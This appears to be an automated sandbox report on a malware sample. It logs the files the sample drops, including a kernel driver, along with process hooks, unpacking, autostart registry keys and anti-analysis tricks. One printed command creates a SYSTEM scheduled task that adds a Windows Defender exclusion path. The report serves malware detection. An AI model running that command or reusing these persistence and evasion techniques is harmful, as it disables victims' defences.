Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: cscui.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: workfoldersshell.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: usermgrproxy.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: tbcore3u.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: tbcore3u.dll	Jump to behavior
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	Section loaded: tbcore3u.dll

Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Documents\WchJz1.exe

File written: C:\Users\Public\Music\destopbak.ini

Jump to behavior

Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: d:\workspace\WinToUSB\Output\x64\Release\setup.pdb source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe
Source:	Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: WchJz1.exe, 00000005.00000003.2435951929.0000000003B19000.00000004.00000020.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000000.2723250895.0000000000048000.00000002.00000001.01000000.0000000A.sdmp, mm3ujg.exe, 00000027.00000002.2946744392.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2946530757.0000000000048000.00000002.00000001.01000000.0000000A.sdmp, mm3ujg.exe, 00000028.00000000.2745785771.0000000000048000.00000002.00000001.01000000.0000000A.sdmp, mm3ujg.exe, 00000028.00000002.2753509560.0000000000048000.00000002.00000001.01000000.0000000A.sdmp, nbq99ChWh.exe, 00000029.00000000.2749490125.00000000008E8000.00000002.00000001.01000000.0000000C.sdmp, nbq99ChWh.exe, 00000029.00000002.2757489075.00000000008E8000.00000002.00000001.01000000.0000000C.sdmp, mm3ujg.exe, 0000002C.00000002.2773739470.0000000000048000.00000002.00000001.01000000.0000000A.sdmp, mm3ujg.exe, 0000002C.00000000.2759438958.0000000000048000.00000002.00000001.01000000.0000000A.sdmp, nbq99ChWh.exe, 0000002D.00000000.2760653139.00000000008E8000.00000002.00000001.01000000.0000000C.sdmp, nbq99ChWh.exe, 0000002D.00000002.2773789468.00000000008E8000.00000002.00000001.01000000.0000000C.sdmp, mm3ujg.exe, 0000002E.00000002.2925768634.0000000000048000.00000002.00000001.01000000.0000000A.sdmp, mm3ujg.exe, 0000002E.00000000.2905763332.0000000000048000.00000002.00000001.01000000.0000000A.sdmp, nbq99ChWh.exe, 0000002F.00000000.2909687024.00000000008E8000.00000002.00000001.01000000.0000000C.sdmp, nbq99ChWh.exe, 0000002F.00000002.2926718159.00000000008E8000.00000002.00000001.01000000.0000000C.sdmp, mm3ujg.exe.5.dr, nbq99ChWh.exe.39.dr
Source:	Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source:	Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, WchJz1.exe, 00000004.00000000.2130209027.0000000140014000.00000002.00000001.01000000.00000008.sdmp, WchJz1.exe, 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmp, WchJz1.exe, 00000005.00000000.2147977261.0000000140014000.00000002.00000001.01000000.00000008.sdmp, WchJz1.exe.0.dr

Data Obfuscation

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe

Unpacked PE file: 39.2.mm3ujg.exe.4430000.6.unpack

Source: C:\Users\user\Documents\WchJz1.exe

Code function: 4_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_000000014000F000

Source: initial sample

Static PE information: section where entry point is pointing to: .mo:

Source: vselog.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x2c27d
Source: tbcore3U.dll.39.dr	Static PE information: real checksum: 0x0 should be: 0x4a76c2
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Static PE information: real checksum: 0x33b0d should be: 0x3d148
Source: tbcore3U.dll.5.dr	Static PE information: real checksum: 0x0 should be: 0x4aece1

Source: tbcore3U.dll.5.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.5.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.5.dr	Static PE information: section name: .mo:
Source: tbcore3U.dll.39.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.39.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.39.dr	Static PE information: section name: .mo:

Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe

Code function: 41_2_008E2691 push ecx; ret

41_2_008E26A4

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	File created: C:\Users\user\Documents\WchJz1.exe			Jump to dropped file
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	File created: C:\Users\user\Documents\vselog.dll			Jump to dropped file

Sample is not signed and drops a device driver

Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior

Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	File created: C:\Users\user\Documents\WchJz1.exe	Jump to dropped file
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	File created: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	File created: C:\Windows\System32\drivers\189atohci.sys	Jump to dropped file
Source: C:\Users\user\Documents\WchJz1.exe	File created: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	File created: C:\Users\user\Documents\vselog.dll	Jump to dropped file
Source: C:\Users\user\Documents\WchJz1.exe	File created: C:\Program Files (x86)\mm3ujg\tbcore3U.dll	Jump to dropped file
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	File created: C:\Program Files (x86)\rXFCwD1I\tbcore3U.dll	Jump to dropped file

Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Key value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron Groupfenzhu			Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Key value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron Groupfenzhu			Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"

Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe

Registry key created: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron

Jump to behavior

Source: C:\Users\user\Documents\WchJz1.exe

4_2_0000000140001520

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Documents\WchJz1.exe	Memory written: PID: 7128 base: 7FFE22370008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Memory written: PID: 7128 base: 7FFE2220D9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Memory written: PID: 6808 base: 7FFE22370008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Memory written: PID: 6808 base: 7FFE2220D9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Memory written: PID: 2688 base: 900005 value: E9 8B 2F 60 76	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Memory written: PID: 2688 base: 76F02F90 value: E9 7A D0 9F 89	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Memory written: PID: 2688 base: 930005 value: E9 8B 2F 5D 76	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Memory written: PID: 2688 base: 76F02F90 value: E9 7A D0 A2 89	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Memory written: PID: 6692 base: 1050005 value: E9 8B 2F EB 75	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Memory written: PID: 6692 base: 76F02F90 value: E9 7A D0 14 8A	Jump to behavior
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	Memory written: PID: 1664 base: D60005 value: E9 8B 2F 1A 76
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	Memory written: PID: 1664 base: 76F02F90 value: E9 7A D0 E5 89
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Memory written: PID: 2800 base: 6E0005 value: E9 8B 2F 82 76
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Memory written: PID: 2800 base: 76F02F90 value: E9 7A D0 7D 89
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	Memory written: PID: 2140 base: 1200005 value: E9 8B 2F D0 75
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	Memory written: PID: 2140 base: 76F02F90 value: E9 7A D0 2F 8A
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Memory written: PID: 5624 base: 11C0005 value: E9 8B 2F D4 75
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Memory written: PID: 5624 base: 76F02F90 value: E9 7A D0 2B 8A
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	Memory written: PID: 1908 base: 9C0005 value: E9 8B 2F 54 76
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	Memory written: PID: 1908 base: 76F02F90 value: E9 7A D0 AB 89

Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Documents\WchJz1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	API/Special instruction interceptor: Address: 6C53BC04
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	API/Special instruction interceptor: Address: 6C68CBDE
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	API/Special instruction interceptor: Address: 6C5790FC
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	API/Special instruction interceptor: Address: 6C57A03F
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	API/Special instruction interceptor: Address: 6C5D080B
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	API/Special instruction interceptor: Address: 6C56F12B
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	API/Special instruction interceptor: Address: 6C61C0AF
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	API/Special instruction interceptor: Address: 308007F
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	API/Special instruction interceptor: Address: 307C7B9
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	API/Special instruction interceptor: Address: 311C5E8
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	API/Special instruction interceptor: Address: 342B700
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	API/Special instruction interceptor: Address: 30010CD
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	API/Special instruction interceptor: Address: 307336B
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	API/Special instruction interceptor: Address: 3407AA6
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	API/Special instruction interceptor: Address: 6C593E38
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	API/Special instruction interceptor: Address: 6C595143
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	API/Special instruction interceptor: Address: 6BE3A03F
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	API/Special instruction interceptor: Address: 6BE390FC
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	API/Special instruction interceptor: Address: 6BFA7C0E
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	API/Special instruction interceptor: Address: 6BF59F9E
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	API/Special instruction interceptor: Address: 6C4EDE34
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	API/Special instruction interceptor: Address: 6C59FFCB
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	API/Special instruction interceptor: Address: 6C665F8C
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	API/Special instruction interceptor: Address: 6BF66E74
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	API/Special instruction interceptor: Address: 6BF991B6
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	API/Special instruction interceptor: Address: 6BEF8647
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	API/Special instruction interceptor: Address: 6C681EB4
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	API/Special instruction interceptor: Address: 6C6E8092
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	API/Special instruction interceptor: Address: 6C6E7C0E
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	API/Special instruction interceptor: Address: 6BDFBC04
